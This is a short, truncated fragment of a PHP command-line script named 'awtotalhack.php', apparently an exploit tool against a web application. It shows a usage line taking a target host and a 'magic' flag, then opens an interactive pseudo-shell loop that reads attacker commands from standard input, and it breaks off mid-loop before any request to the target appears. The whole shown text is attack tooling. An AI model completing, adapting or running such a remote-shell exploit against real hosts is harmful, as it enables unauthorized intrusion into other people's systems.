\nEx: awtotalhack.php host.tld on\n");} array_shift($argv); $host = $argv[0]; $magic = $argv[1]; # Start the interactive shell while(1){ fwrite(STDOUT, "[shell:~ # "); if ($magic == "on") { $c = str_split(trim(fgets(STDIN))); if (implode($c) == "exit") {die();}; for($i=0;$i